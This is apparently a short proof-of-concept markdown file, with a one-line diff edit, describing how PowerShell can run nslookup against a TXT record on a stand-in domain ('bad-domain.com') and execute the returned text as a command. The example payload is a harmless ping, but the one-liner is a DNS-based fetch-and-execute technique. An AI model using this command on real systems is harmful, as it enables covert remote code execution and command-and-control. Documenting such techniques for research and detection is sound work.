Dood3/PoCs/nshookup/variants/del_var.md

 `powershell (nslookup -q=txt bad-domain.com)[5]`<br><br>
 DNS Server TXT entry:<br>
 `ping google.com`<br><br>
 *EXPLANATION: nslookup.exe calls the TXT entry through DNS as subprocess from powershell.
 This way the stored commands get transmitted over DNS and executed in the context of the current (powershell) process.
-The number in the brackets stands for the index (five being the first possible one) of the command.
+The number in the square brackets stands for the index (five being the first possible one) of the command.
 It is also possible to use "[-1]" should there be only a single command available as TXT entry.*<br><br>

 The outcome is `powershell ping google.com` being executed in the current session on the clients system.